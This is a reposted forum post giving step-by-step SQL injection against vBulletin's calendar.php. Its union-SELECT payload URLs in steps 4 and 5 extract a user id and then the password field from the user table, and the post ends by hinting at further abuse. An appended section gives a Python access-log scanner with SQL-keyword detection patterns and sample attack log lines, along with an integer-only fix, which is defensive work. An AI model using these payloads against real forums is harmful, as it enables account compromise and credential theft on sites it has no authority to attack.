[Repost] The steps to exploit vBulletin forum

Source: fatb@zzu
Author: fatb

1. Make sure calendar.php exists.

2. Add a private event:

http://www.xxx.com/calendar.php? ... type=private&s=

3. You will get an eventid (e.g. 14) after that; now check that event.

http://www.xxx.com/calendar.php?s=&action=edit&eventid=14

4. Get your userid:

http://www.xxx.com/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate

If the MySQL version is below 4.0.0, this step will fail.

The userid is shown in the subject field (e.g. 31874).

The userid is needed in order to pass the following check:

----------------------------------------------------------------
if ($eventinfo[userid] != $bbuserinfo[userid])
{
    $permissions=getpermissions();
    if ($permissions[canpublicedit]!=1) {
        show_nopermission();
    }
}
-----------------------------------------------------------------

5. The dirty part:

http://www.xxx.com/calendar.php?s=&action=edit&eventid=14 union (SELECT 1,0,31874,'0000-0-0',password,userid FROM user WHERE userid = 31874) order by eventdate

Let the subject and event fields show the result.

6. There are a lot of other things you could do. ;)
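A defender-side view of steps 4 and 5, as an added example that is not part of the original post: a legitimate request always carries a plain integer in `eventid`, so any `calendar.php` request where it does not is worth flagging in the web server access log. The log lines, the function names and the common-log-format layout are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Request line inside a common/combined log entry: "GET /path?query HTTP/1.x"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_KEYWORDS = re.compile(r"\b(union|select|from|order\s+by)\b", re.I)

# Constructed sample entries (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2004:10:00:00 +0000] "GET /calendar.php?s=&action=edit&eventid=14 HTTP/1.0" 200 5120',
    '203.0.113.5 - - [01/Jan/2004:10:00:09 +0000] "GET /calendar.php?s=&action=edit&eventid=14%20union%20(SELECT%201)%20order%20by%20eventdate HTTP/1.0" 200 5340',
    '203.0.113.9 - - [01/Jan/2004:10:01:00 +0000] "GET /calendar.php?action=edit&eventid=14%2520union%2520select%25201 HTTP/1.0" 200 5340',
    '203.0.113.7 - - [01/Jan/2004:10:02:00 +0000] "GET /calendar.php?action=edit&eventid=abc HTTP/1.0" 200 900',
    '203.0.113.7 - - [01/Jan/2004:10:03:00 +0000] "GET /showthread.php?t=14%20union HTTP/1.0" 200 900',
]


def fully_decode(value, rounds=3):
    """Undo layered percent-encoding (e.g. %2520) so it cannot hide the value."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value.strip()


def scan_log(lines):
    """Return (line_number, reason, decoded_eventid) for suspicious calendar.php hits."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith("/calendar.php"):
            continue
        # parse_qs already decodes once; fully_decode handles double encoding.
        for raw in parse_qs(target.query, keep_blank_values=True).get("eventid", []):
            value = fully_decode(raw)
            if re.fullmatch(r"[0-9]+", value):
                continue  # the only shape a legitimate eventid has
            reason = "sql-keywords" if SQL_KEYWORDS.search(value) else "non-integer"
            findings.append((number, reason, value))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule is the fix on the server side: rejecting or integer-casting `eventid` before it reaches the query removes the injection point that steps 4 and 5 rely on.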